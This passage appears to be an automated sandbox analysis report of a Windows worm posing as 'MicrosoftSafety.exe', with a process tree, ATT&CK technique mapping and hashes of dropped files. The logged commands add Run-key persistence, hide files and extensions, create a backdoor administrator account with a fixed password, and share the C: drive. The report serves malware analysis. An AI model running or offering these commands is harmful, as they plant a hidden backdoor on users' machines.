  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:2696
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4872
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2432
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 users /add SYS_4321 passPass
1⤵
PID:1268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 users SYS_4321 passPass
1⤵
PID:1632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share SYS_C$=C:\
1⤵
PID:2804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators /add SYS_4321
1⤵
PID:4372

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4272

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program File\Microsoft\MicrosoftSafety.exe

Filesize
276KB

MD5
6cdcb0900130b5cce6a2ae36868c1d9b

SHA1
05e2afbd095a163e6fac8822ed49ca565b688b39

SHA256
bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941

SHA512
5f4cb49137167656ca482fd4e1e98c02a7e4e51a65a70a48179183e36a87fdf91e0596273255e0d931d6205fa4c187bd078aefc20ea35dd1892aff643a7d21a0

Download Submit
C:\autorun.inf

Filesize
87B

MD5
a58e87ffeec377bdfe74aa489e222618

SHA1
ce4755bf320611f95b2e6fd8128a95d22b2680da

SHA256
fd5ee8d0b5bfe9e3d8e7088253d80602c554d62d2ee69ad9270722c251d6eff0

SHA512
1e5cf2c04ecc7e16dd26020c73a8a47059cce08f8224632621818d62dd00f928a1829e385db4cfbda1dc438dcc1187903556dd483d5786ebe6cfad915a459c66

Download Submit
memory/1604-132-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/1604-201-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads